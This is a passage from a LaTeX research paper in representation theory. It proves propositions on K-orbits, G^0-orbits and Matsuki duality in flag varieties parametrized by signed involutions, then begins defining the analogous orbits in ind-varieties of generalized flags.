that $\delta$ preserves orthogonality with respect to $\phi$, we see as in Case 2 that
\begin{eqnarray*}
\delta(v_\ell^{(\ell-1)}) & \in & \big(\langle v_k^{(\ell-1)}:1\leq
k\leq w_\ell\rangle_\mathbb{C}+\langle v_{w_k}^{(\ell-1)}:1\leq k\leq
\ell-1\rangle_\mathbb{C}\big) \\
& & \cap\,\langle
v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\dag.
\end{eqnarray*} Therefore
\begin{equation} \label{11-new}
\delta(v_\ell^{(\ell-1)})=\sum_{k\in
I}\lambda_kv_k^{(\ell-1)}\quad\mbox{with $\lambda_k\in\mathbb{C}$,}
\end{equation}
where $I:=\{k:\ell\leq k\leq w_\ell,\ \ell\leq w_k\}\subset\hat{I}:=\{k:\ell\leq k,\ \ell\leq w_k\}$.
This implies
\[\lambda_{w_\ell}=\phi(v_\ell^{(\ell-1)},\delta(v_\ell^{(\ell-1)}))={}^t\overline{v_\ell^{(\ell-1)}}\Phi\Phi v_\ell^{(\ell-1)}={}^t\overline{v_\ell^{(\ell-1)}}v_\ell^{(\ell-1)}\in\mathbb{R}_+^*.\]
It is straightforward to check that the basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ defined by
\begin{eqnarray*}
& & v_\ell^{(\ell)}:=\frac{1}{\sqrt{\lambda_{w_\ell}}}v_\ell^{(\ell-1)},\quad
v_{w_\ell}^{(\ell)}:=\frac{1}{\sqrt{\lambda_{w_\ell}}}\delta(v_\ell^{(\ell-1)}),
\\
& & v_k^{(\ell)}:=v_k^{(\ell-1)}-\frac{\phi(v_k^{(\ell-1)},\delta(v_\ell^{(\ell-1)}))}{\lambda_{w_\ell}}v_\ell^{(\ell-1)}
\quad\mbox{for all $k\in \hat{I}\setminus\{\ell,w_\ell\}$,} \\
& & v_k^{(\ell)}:=v_k^{(\ell-1)}\quad\mbox{for all $k\in\{1,\ldots,n\}\setminus \hat{I}$}
\end{eqnarray*}
is $(w,\varepsilon)$-dual and satisfies conditions
(\ref{9-new}) and (\ref{10-new}).
\end{proof}
\begin{proof}[Proof of Proposition \ref{P2}\,{\rm (b)}--{\rm (d)}]
Let $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ where
$(v_1,\ldots,v_n)$ is a $(w,\varepsilon)$-conjugate basis. Then by
definition we have
\[\delta(\langle v_1,\ldots,v_k\rangle_\mathbb{C})=\langle v_{w_j}:j\in\{1,\ldots,k\}\rangle_\mathbb{C}\,,\]
hence \begin{eqnarray*} \dim \delta(\langle
v_1,\ldots,v_k\rangle_\mathbb{C})\cap \langle v_1,\ldots,v_\ell\rangle_\mathbb{C} & = &
|\{j\in\{1,\ldots,\ell\}:w^{-1}_j\in\{1,\ldots,k\}\}| \\
& = &
|\{j\in\{1,\ldots,\ell\}:w_j\in\{1,\ldots,k\}\}|
\end{eqnarray*}
for all $k,\ell\in\{1,\ldots,n\}$. Moreover, for
$\varepsilon\in\{+1,-1\}$ we have
\begin{eqnarray*}
\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\ker(\delta-\varepsilon\mathrm{id}) & =
&
\langle v_j:1\leq w_j=j\leq \ell\mbox{ and }\varepsilon_j=\varepsilon\rangle_\mathbb{C} \\
& & +\langle
v_j+\varepsilon v_{w_j}:1\leq w_j<j\leq \ell\rangle_\mathbb{C}\,.
\end{eqnarray*}
Therefore
\[
\big(\dim \langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap V_+,\dim \langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap V_-\big)_{\ell=1}^n=\varsigma(w,\varepsilon).
\]
Altogether this yields the inclusion
\begin{equation}
\label{3} \mathcal{O}_{(w,\varepsilon)}\subset\big\{\mathcal{F}\in
X: (\delta(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\mbox{ and
}\varsigma(\delta:\mathcal{F})=\varsigma(w,\varepsilon)\big\}.
\end{equation}
Now let $(v_1,\ldots,v_n)$ be a $(w,\varepsilon)$-dual basis. Then
\begin{eqnarray*}
\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\dag\cap\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C} & = & \langle
v_j:j\in\{1,\ldots,\ell\}\mbox{ and }w_j>n-k\rangle_\mathbb{C} \\
& = & \langle
v_j:j\in\{1,\ldots,\ell\}\mbox{ and }(w_0w)_j\leq k\rangle_\mathbb{C}\,,
\end{eqnarray*}
whence
\[\dim\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\dag\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=|\{j\in\{1,\ldots,\ell\}:(w_0w)_j\in\{1,\ldots,k\}|\]
for all $k,\ell\in\{1,\ldots,n\}$. In particular we see that
\[\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}^\dag\oplus\langle v_j:
j\in\{1,\ldots,\ell\}\mbox{ and }w_j\leq \ell\rangle_\mathbb{C}.\] It follows
that the vectors $v_j$ (for $1\leq w_j=j\leq \ell$) and
$\frac{1}{\sqrt{2}}(v_j\pm v_{w_j})$ (for $1\leq w_j<j\leq \ell$)
form a basis of the quotient space $\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}/\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}^\dag$. This basis is $\phi$-orthogonal and,
since $(v_1,\ldots,v_n)$ is $(w,\varepsilon)$-dual, we have
\[
\textstyle \phi(v_j,v_j)=\varepsilon_j\mbox{ if $w_j=j$};\quad
\left\{\begin{array}{l}
\phi\big(\frac{v_j+v_{w_j}}{\sqrt{2}},\frac{v_j+v_{w_j}}{\sqrt{2}}\big)=1,\\[2mm]
\phi\big(\frac{v_j-v_{w_j}}{\sqrt{2}},\frac{v_j-v_{w_j}}{\sqrt{2}}\big)=-1
\end{array}\right.\mbox{ if $w_j<j$.}
\]
Therefore the signature of $\phi$ on $\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}/\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}^\dag$ is the pair
\[
\begin{array}{rll}
\big( & |\{j:w_j=j\leq\ell,\
\varepsilon_j=+1\}|+|\{j:w_j<j\leq\ell\}|,
\\[2mm]
& |\{j:w_j=j\leq\ell,\
\varepsilon_j=-1\}|+|\{j:w_j<j\leq\ell\}| & \big)\end{array}
\]
which coincides with the $\ell$-th term of the sequence
$\varsigma(w,\varepsilon)$. Finally, we obtain the inclusion
\begin{equation}
\label{4} \mathfrak{O}_{(w,\varepsilon)}\subset\big\{\mathcal{F}\in
X: (\mathcal{F}^\dag,\mathcal{F})\in\mathbb{O}_{w_0w}\mbox{ and
}\varsigma(\phi:\mathcal{F})=\varsigma(w,\varepsilon)\big\}.
\end{equation}
It is clear that $K$ (resp., $G^0$) acts transitively on the set of
$(w,\varepsilon)$-conjugate bases (resp., $(w,\varepsilon)$-dual
bases). Hence the subsets $\mathcal{O}_{(w,\varepsilon)}$ (resp.
$\mathfrak{O}_{(w,\varepsilon)}$) are $K$-orbits (resp.,
$G^0$-orbits). Moreover, in view of (\ref{3}) and (\ref{4}) these
orbits are pairwise distinct.
Let $\mathcal{O}$ be a $K$-orbit of $X$. Note that the basis $(e_1,\ldots,e_n)$ of
$V$ satisfies $\delta(e_j)=\pm
e_j$ for all $j$, hence the flag
$\mathcal{F}_0:=\mathcal{F}(e_1,\ldots,e_n)$ satisfies
$\delta(\mathcal{F}_0)=\mathcal{F}_0$. By
\cite{Richardson-Springer} the $K$-orbit $\mathcal{O}$ contains an
element of the form $g\mathcal{F}_0$ for some $g\in G$ such that
$h:=\Phi g^{-1}\Phi g\in N$ where, as in the proof of Proposition
\ref{P1}, $N\subset G$ stands for the subgroup of matrices with
exactly one nonzero entry in each row and each column. Since
$\Phi\in N$ we also have $\Phi h\in N$. Hence there is a permutation
$w\in\mathfrak{S}_n$ and constants
$t_1,\ldots,t_n\in\mathbb{C}^*$ such that the matrix $\Phi
h=:\big(a_{k,\ell}\big)_{1\leq k,\ell\leq n}$ has entries
\[a_{k,\ell}=0\ \mbox{ if $\ell\not=w_k$,}\quad a_{k,w_k}=t_k\quad\mbox{ for all $k,\ell\in\{1,\ldots,n\}$}.\]
The relation $\Phi h=g^{-1}\Phi g$ shows that $(\Phi h)^2=1_n$. This
yields $w^2=\mathrm{id}$ and $t_kt_{w_k}=1$ for all $k$; hence
\[t_{w_k}=t_k^{-1}\ \mbox{ whenever $w_k\not=k$}\quad\mbox{and}\quad \varepsilon_k:=t_k\in\{+1,-1\}\ \mbox{ whenever
$w_k=k$}.\] In addition, since $\Phi h$ is conjugate to $\Phi$, its
eigenvalues $+1$ and $-1$ have respective multiplicities $p$ and
$q$, which forces
\[(w,\varepsilon)\in\mathfrak{I}_n(p,q).\]
For each $k\in\{1,\ldots,n\}$ with $w_k<k$, we
take $s_k\in\mathbb{C}^*$ such that $t_k=s_k^2$ and set
$s_{w_k}=s_k^{-1}$ (so that $s_{w_k}^2=t_k^{-1}=t_{w_k}$). Moreove,r
for each $k\in\{1,\ldots,n\}$ with $w_k=k$ we set $s_k=1$. The
equality $\Phi g=g\Phi h$ yields
\[
\delta(g(s_ke_k))=s_k\Phi g e_k=s_k g(\Phi h)e_k=s_k
g(t_{w_k}e_{w_k})=s_{w_k}^{-1}
g(s_{w_k}^2e_{w_k})=g(s_{w_k}e_{w_k})
\]
for all $k\in\{1,\ldots,n\}$ such that $w_k\not=k$, and
\[
\delta(g(s_k e_k))=\delta(g(e_k))=\Phi g e_k=g(\Phi
h)e_k=g(\varepsilon_k e_k)=\varepsilon_k g(e_k)=\varepsilon_k g(s_k
e_k)
\]
for all $k\in\{1,\ldots,n\}$ such that $w_k=k$. Hence the family
$(g(s_1 e_1),\ldots,g(s_n e_n))$ is a $(w,\varepsilon)$-conjugate basis of
$V$. Thus
\[g\mathcal{F}_0=g\mathcal{F}(e_1,\ldots,e_n)=g\mathcal{F}(s_1 e_1,\ldots,s_n e_n)=\mathcal{F}(g(s_1 e_1),\ldots,g(s_n e_n))\in\mathcal{O}_{(w,\varepsilon)}.\]
Therefore $\mathcal{O}=\mathcal{O}_{(w,\varepsilon)}$.
We conclude that the subsets $\mathcal{O}_{(w,\varepsilon)}$ (for
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the $K$-orbits
of $X$. Matsuki duality then guarantees that the subsets
$\mathfrak{O}_{(w,\varepsilon)}$ (for
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the
$G^0$-orbits of $X$. This fact implies in particular that
equality holds in (\ref{3}) and (\ref{4}). Altogether we have shown
parts {\rm (b)} and {\rm (c)} of the statement.
Finally, part {\rm (a)} shows that for every
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ the intersection
$\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}$
consists of a single $K\cap G^0$-orbit, which guarantees that the
orbits $\mathcal{O}_{(w,\varepsilon)}$ and
$\mathfrak{O}_{(w,\varepsilon)}$ are Matsuki dual (see
\cite{Matsuki,Matsuki3}). This proves part {\rm (d)} of the
statement. The proof of Proposition \ref{P2} is complete.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P3}]
The proof relies on the following two technical claims.
\medskip
\item
{\it Claim 1:}
For every signed involution $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ we have
$\mathcal{O}_{(w,\varepsilon)}\cap X_\omega=\emptyset$ unless $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$.
\medskip
\noindent
{\it Claim 2:}
For every $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$ there is a basis $\underline{v}=(v_1,\ldots,v_n)$ which is simultaneously $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18}).
\medskip
Assuming Claims 1 and 2, the proof of the proposition proceeds as follows. For every $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ the inclusions
\begin{eqnarray}
\label{proof.P3.1} & \{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate
and satisfies (\ref{3.3.18})}\}\subset\mathcal{O}_{(w,\varepsilon)}\cap X_\omega,
\\
\label{proof.P3.2} & \{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual
and satisfies (\ref{3.3.18})}\}\subset\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega, \\
\label{proof.P3.3} & \{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18})}\}\\ \nonumber
& \subset
\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega
\end{eqnarray}
clearly hold. Hence Claim 2 shows that
$\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$, $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$, and
$\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ are all nonempty whenever $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$.
By Claim 1, Lemma \ref{lemma-2.2.1}, and Proposition \ref{P2}\,{\rm (c)}, the $K$-orbits of $X_\omega$ are exactly the subsets $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$.
On the other hand the subsets $\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ (for $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are $G^0$-stable and pairwise disjoint. By Matsuki duality there is a bijection between $K$-orbits and $G^0$-orbits. This forces $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}=\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ to be a single $G^0$-orbit whenever $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$ and $\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ to be empty if $(w,\varepsilon)\notin\mathfrak{I}_n^{\eta,\epsilon}(p,q)$.
This proves Proposition \ref{P3}\,{\rm (b)}.
Since the orbits $\mathcal{O}_{(w,\varepsilon)},\mathfrak{O}_{(w,\varepsilon)}\subset X$ are Matsuki dual (see Proposition \ref{P2}\,{\rm (d)}), their intersection $\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}$ is compact, hence such is the intersection $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\cap
\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ for all $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$. This implies that $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ and $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ are Matsuki dual (see \cite{Gindikin-Matsuki}), and therefore part {\rm (c)} of the statement.
Let $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$. Since $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ and $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ are Matsuki dual, their intersection is a single $K\cap G^0$-orbit. The set on the left-hand side in (\ref{proof.P3.3}) is nonempty (by Claim 2) and $K\cap G^0$-stable, hence equality holds in (\ref{proof.P3.3}). Similarly, the sets on the left-hand sides in (\ref{proof.P3.1}) and (\ref{proof.P3.2}) are nonempty (by Claim 2) and respectively $K$- and $G^0$-stable. Since $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}=\mathcal{O}_{(w,\varepsilon)}\cap X_\omega$ and $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}=\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ are respectively a $K$-orbit and a $G^0$-orbit, equality holds in (\ref{proof.P3.1}) and (\ref{proof.P3.2}). This shows part {\rm (a)} of the statement.
Thus the proof of Proposition \ref{P3} will be complete once we establish Claims 1 and 2.
\medskip
\noindent
{\it Proof of Claim 1.}
Note that for two subspaces $A,B\subset V$ we have
$A^\perp+B^\perp=(A\cap B)^\perp$, hence
\begin{equation}
\label{proof-P3.4}
\dim A^\perp\cap B^\perp+\dim A+\dim B=\dim A\cap B+\dim V.
\end{equation}
Note also that the map $\delta$ is selfadjoint (in types BD1 and C2) or antiadjoint (in types C1 and D3) with respect to $\omega$, hence the equality $\delta(A)^\perp=\delta(A^\perp)$ holds for any subspace $A\subset V$ in all types.
Let $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ such that $\mathcal{O}_{(w,\varepsilon)}\cap X_\omega\not=\emptyset$.
Let $\mathcal{F}=(F_0,\ldots,F_n)\in \mathcal{O}_{(w,\varepsilon)}\cap X_\omega$.
By applying (\ref{proof-P3.4}) to $A=\delta\left( F_k\right)$ and $B=F_\ell$ for $1\leq k,\ell\leq n$ we obtain
\begin{equation}
\label{proof-P3.5}
\dim \delta\left( F_{n-k}\right)\cap F_{n-\ell}+k+\ell=\dim \delta \left(F_k\right)\cap F_\ell+n.
\end{equation}
On the other hand since $\mathcal{F}\in\mathcal{O}_{(w,\varepsilon)}$ Proposition \ref{P2}\,{\rm (b)} gives
\begin{equation}
\label{proof-P3.6}
\dim \delta\left( F_{n-k}\right)\cap F_{n-\ell}=|\{j=1,\ldots,n-\ell:1\leq w_j\leq n-k\}|
\end{equation}
and
\begin{eqnarray}
\label{proof-P3.7}
\dim\delta \left(F_k\right)\cap F_\ell & = & |\{j=1,\ldots,\ell:1\leq w_j\leq k\}| \\
\nonumber & = & \ell-|\{j=1,\ldots,\ell:w_j\geq k+1\}| \\
\nonumber & = & \ell-(n-k-|\{j\geq \ell+1:w_j\geq k+1\}|) \\
\nonumber & = & \ell+k-n+|\{j=1,\ldots,n-\ell:w_0ww_0(j)\leq n-k\}|
\end{eqnarray}
for all $k,\ell\in\{1,\ldots,n\}$. Comparing (\ref{proof-P3.5})--(\ref{proof-P3.7}) we conclude that $w=w_0ww_0$.
Let $k\in\{1,\ldots,n\}$ such that $w_k=k$. Since $ww_0=w_0w$, we have $w_{n-k+1}=n-k+1$.
Applying (\ref{proof-P3.4}) with $A=F_k$ (resp., $A=F_{k-1}$) and $B=V_+$, we get
\[1+\dim F_{k-1}\cap V_+-\dim F_k\cap V_+=\dim F_{n-k+1}\cap V_--\dim F_{n-k}\cap V_-\]
in types BD1 and C2 (where $V_+^\perp=V_-$), whence
\begin{eqnarray*}
\varepsilon_k=1 & \Leftrightarrow & \dim F_k\cap V_+=\dim F_{k-1}\cap V_++1 \\
& \Leftrightarrow & \dim F_{n-k+1}\cap V_-=\dim F_{n-k}\cap V_-\Leftrightarrow\varepsilon_{n-k+1}=1
\end{eqnarray*}
in that case. In types C1 and D3 (where $V_+^\perp=V_+$), we get
\[1+\dim F_{k-1}\cap V_+-\dim F_k\cap V_+=\dim F_{n-k+1}\cap V_+-\dim F_{n-k}\cap V_+\,,\]
whence also
\[\varepsilon_k=1\Leftrightarrow \varepsilon_{n-k+1}=-1\,.\]
At this point we obtain that the signed involution $(w,\varepsilon)$ satisfies conditions {\rm (i)}--{\rm (ii)} in Section \ref{S3.3}.
To conclude that $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$, it remains to check that in types C2 and D3 we have $w_k\not=n-k+1$ for all $k\leq\frac{n}{2}$. Arguing by contradiction, assume that $w_k=n-k+1$. Since $\mathcal{F}\in\mathcal{O}_{(w,\varepsilon)}$ there is a $(w,\varepsilon)$-conjugate basis $\underline{v}=(v_1,\ldots,v_n)$ such that $\mathcal{F}=\mathcal{F}(\underline{v})$.
Thus $\delta(v_k)=v_{n-k+1}$ so that we can write $v_k=v_k^++v_k^-$ and $v_{n-k+1}=v_k^+-v_k^-$.
In type C2 we have $V_+^\perp=V_-$ and $\omega$ is antisymmetric, hence
\[\omega(v_k^++v_k^-,v_k^+-v_k^-)=\omega(v_k^+,v_k^+)-\omega(v_k^-,v_k^-)=0-0=0.\]
In type D3 we have $V_+^\perp=V_+$, $V_-^\perp=V_-$, and $\omega$ is symmetric hence
\[\omega(v_k^++v_k^-,v_k^+-v_k^-)=-\omega(v_k^+,v_k^-)+\omega(v_k^-,v_k^+)=0.\]
In both cases we deduce
\[F_{n-k+1}=F_{n-k}+\langle v_{n-k+1}\rangle_{\mathbb{C}}\subset F_k^\perp+F_{k-1}^\perp\cap\langle v_k\rangle_\mathbb{C}^\perp=F_k^\perp=F_{n-k},\]
a contradiction.
This completes the proof of Claim 1.
\medskip
\noindent
{\it Proof of Claim 2.}
For $k\in\{1,\ldots,n\}$ set $k^*=n-k+1$. We can write
\[w=(c_1;c'_1)\cdots(c_s;c'_s)(c'^*_1;c^*_1)\cdots(c'^*_s;c^*_s)(d_1;d^*_1)\cdots(d_t;d^*_t)\]
where $c_1<\ldots<c_s<c^*_s<\ldots<c^*_1$, $c_j<c'_j\not=c^*_j$ for all $j$, $d_1<\ldots<d_t<d^*_t<\ldots<d^*_1$. Note that $t=0$ in types C2 and D3.
Moreover, we denote
\begin{eqnarray*}
& \{a_1<\ldots<a_{p-t-2s}\}:=\{k:w_k=k,\ \varepsilon_k=1\},\\
& \{b_1<\ldots<b_{q-t-2s}\}:=\{k:w_k=k,\ \varepsilon_k=-1\}.
\end{eqnarray*}
We can construct a $\phi$-orthonormal basis
\[x_1^+,\ldots,x_t^+,y^+_1,\ldots,y^+_s,y^{+*}_s,\ldots,y^{+*}_1,z^+_1,\ldots,z^+_{p-t-2s}\]
of $V_+$, and a $(-\phi)$-orthonormal basis
\[x_1^-,\ldots,x_t^-,y^-_1,\ldots,y^-_s,y^{-*}_s,\ldots,y^{-*}_1,z^-_1,\ldots,z^-_{q-t-2s}\]
of $V_-$,
such that in types BD1 and C2 (where the restriction of $\omega$ on $V_+$ and $V_-$ is nondegenerate) we have
\begin{eqnarray*}
& \omega(x^+_j,x^+_j)=\omega(x^-_j,x^-_j)=1,\\
& \omega(y^+_j,y^{+*}_j)=\omega(y^-_j,y^{-*}_j)=1,\quad\omega(y^{+*}_j,y^+_j)=\omega(y^{-*}_j,y^-_j)=\epsilon, \\
& \omega(z^+_j,z^+_{\ell})=\left\{\begin{array}{ll} 1 & \mbox{if $j\leq \ell=p-t-2s+1-j$} \\ \epsilon & \mbox{if $j>\ell=p-t-2s+1-j, $} \end{array}\right.
\\
& \omega(z^-_j,z^-_{\ell})=\left\{\begin{array}{ll} 1 & \mbox{if $j\leq \ell=q-t-2s+1-j$} \\ \epsilon & \mbox{if $j>\ell=q-t-2s+1-j, $} \end{array}\right.
\end{eqnarray*}
and the other values of $\omega$ on the basis to equal $0$. In types C1 and D3 (where $V_+^\perp=V_+$, $V_-^\perp=V_-$, and in particular $p=q=\frac{n}{2}$ in this case) we require that
\begin{eqnarray*}
& \omega(x^+_j,x^-_j)=i,\quad \omega(x^-_j,x^+_j)=\epsilon i,\\
& \omega(y^+_j,y^{-*}_j)=\omega(y^-_j,y^{+*}_j)=1,\quad\omega(y^{+*}_j,y^-_j)=\omega(y^{-*}_j,y^+_j)=\epsilon, \\
& \omega(z^+_j,z^-_{\ell})=\epsilon\omega(z^-_\ell,z^+_j)=\left\{\begin{array}{ll} 1 & \mbox{if $\ell=\tilde{j}:=\frac{n}{2}-t-2s+1-j$ and $a_j<b_{\tilde{j}}$} \\ \epsilon & \mbox{if $\ell=\tilde{j}:=\frac{n}{2}-t-2s+1-j$ and $a_j>b_{\tilde{j}}$,} \end{array}\right.
\end{eqnarray*}
while the other values of $\omega$ on the basis are $0$.
In contrast to the value of $\omega(z_j^\pm,z_\ell^\pm)$ in types BD1,C2, the value of $\omega(z_j^+,z_\ell^-)$ in types C1,D3 is not subject to a constraint but is chosen so that the basis $(v_1,\ldots,v_n)$ below satisfies (\ref{3.3.18}).
In all cases we construct a basis $(v_1,\ldots,v_n)$ by setting
\[v_{d_j}=\frac{x^+_j+ix^-_j}{\sqrt{2}},\quad v_{d_j^*}=\frac{x^+_j-ix^-_j}{\sqrt{2}},\]
\[v_{c_j}=\frac{y^+_j+y^-_j}{\sqrt{2}},\quad v_{c'_j}=\frac{y^+_j-y^-_j}{\sqrt{2}},\quad v_{c^*_j}=\frac{y^{+*}_j+y^{-*}_j}{\sqrt{2}},\quad v_{c'^*_j}=\frac{y^{+*}_j-y^{-*}_j}{\sqrt{2}},\]
\[v_{a_j}=z^+_j,\quad\mbox{and}\quad v_{b_j}=z_j^-.\]
It is straightforward to check that the basis $(v_1,\ldots,v_n)$ is both $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18}). This completes the proof of Claim 2.
\end{proof}
\section{Orbit duality in ind-varieties of generalized flags}
\label{S4}
Following the pattern of Section~\ref{S3}, we now present our results on orbit duality in the infinite-dimensional case. All proofs are given in Section~\ref{S4.proofs}.
\subsection{Types A1 and A2}
\label{S4.1}
The notation is as Section \ref{S:A1A2}.
For every $\ell\in\mathbb{N}^*$ there is a unique $\ell^*\in\mathbb{N}^*$
such that $\omega(e_\ell,e_{\ell^*})\not=0$,
and this yields a bijection $\iota:\mathbb{N}^*\to\mathbb{N}^*$, $\ell\mapsto\ell^*$.
Let $\mathfrak{I}_\infty(\iota)$ be the set of involutions $w:\mathbb{N}^*\to\mathbb{N}^*$
such that $w(\ell)=\ell^*$ for all but finitely many $\ell\in\mathbb{N}^*$.
In particular we have $w\iota\in\mathfrak{S}_\infty$ for all $w\in\mathfrak{I}_\infty(\iota)$.
Let $\mathfrak{I}'_\infty(\iota)\subset \mathfrak{I}_\infty(\iota)$
be the subset of involutions without fixed points (i.e., such that $w(\ell)\not=\ell$ for all $\ell\in\mathbb{N}^*$).
Let $\sigma:\mathbb{N}^*\to(A,\prec)$ be a bijection onto a totally ordered set,
and let us consider the ind-variety of generalized flags $\mathbf{X}(\mathcal{F}_\sigma,E)$.
In Proposition \ref{P4-1.1} below we show that the $\mathbf{K}$-orbits
and the $\mathbf{G}^0$-orbits of $\mathbf{X}(\mathcal{F}_\sigma,E)$ are parametrized by the elements of $\mathfrak{I}_\infty(\iota)$ in type A1, and by elements of $\mathfrak{I}'_\infty(\iota)$ in type A2.
\begin{definition}
Let $w\in\mathfrak{I}_\infty(\iota)$.
Let $\underline{v}=(v_1,v_2,\ldots)$ be a basis of $\mathbf{V}$ such that
\begin{equation}
\label{4.1.1}
v_\ell=e_\ell\quad\mbox{for all but finitely many $\ell\in\mathbb{N}^*$}.
\end{equation}
We call $\underline{v}$ {\em $w$-dual} if in addition to (\ref{4.1.1}) $\underline{v}$ satisfies
\[\omega(v_\ell,v_k)=\left\{
\begin{array}{ll}
0 & \mbox{if $\ell\not=w_k$,} \\
\pm1 & \mbox{if $\ell=w_k$}
\end{array}
\quad\mbox{for all $k,\ell\in\mathbb{N}^*$,}
\right.\]
and we call $\underline{v}$ {\em $w$-conjugate} if in addition to (\ref{4.1.1})
\[\gamma(v_k)=\pm v_{w_k}\quad\mbox{for all $k\in\mathbb{N}^*$.}\]
Set
$\bs{\mathcal{O}}_w:=\{\mathcal{F}_{\sigma}(\underline{v}):\mbox{$\underline{v}$ is $w$-dual}\}$ and $\bs{\mathfrak{O}}_w:=\{\mathcal{F}_{\sigma}(\underline{v}):\mbox{$\underline{v}$ is $w$-conjugate}\}$, so that $\bs{\mathcal{O}}_w$ and $\bs{\mathfrak{O}}_w$ are subsets of the ind-variety $\mathbf{X}(\mathcal{F}_\sigma,E)$.
\end{definition}
\paragraph{\bf Notation.}
{\rm (a)}
We use the abbreviation $\mathbf{X}:=\mathbf{X}(\mathcal{F}_\sigma,E)$. \\
{\rm (b)}
If $\mathcal{F}$ is a generalized flag weakly compatible with $E$,
then $\mathcal{F}^\perp:=\{F^\perp:F\in\mathcal{F}\}$ is also a generalized flag weakly compatible with $E$.
Let $(A^*,\prec^*)$ be the totally ordered set given by $A^*=A$ as a set and $a\prec^*a'$ whenever $a\succ a'$.
Let $\sigma^\perp:\mathbb{N}^*\to(A^*,\prec^*)$ be defined by $\sigma^\perp(\ell)=\sigma(\ell^*)$.
Then we have
$\mathcal{F}_\sigma^\perp=\mathcal{F}_{\sigma^\perp}$.
Note that $\mathcal{F}^\perp$ is $E$-commensurable with $\mathcal{F}_{\sigma^\perp}$
whenever $\mathcal{F}$ is $E$-commensurable with $\mathcal{F}_\sigma$.
Hence the map
\[\mathbf{X}\to\mathbf{X}^\perp:=\mathbf{X}(\mathcal{F}_{\sigma^\perp},E),\ \mathcal{F}\mapsto\mathcal{F}^\perp\]
is well defined.
We also use the abbreviation $\pmb{\mathbb{O}}^\perp_w:=(\pmb{\mathbb{O}}_{\sigma^\perp,\sigma})_w$ for all $w\in\mathfrak{S}_\infty$. \\
{\rm (c)}
We further note that $\gamma(\mathcal{F}_\sigma)=\mathcal{F}_{\sigma\circ\iota}$
and that $\gamma(\mathcal{F})\in\mathbf{X}^\gamma:=\mathbf{X}(\mathcal{F}_{\sigma\circ\iota},E)$ whenever $\mathcal{F}\in\mathbf{X}$.
We also abbreviate $\pmb{\mathbb{O}}^\gamma_w:=(\pmb{\mathbb{O}}_{\sigma\circ\iota,\sigma})_w$ for all $w\in\mathfrak{S}_\infty$.
\medskip
Thus
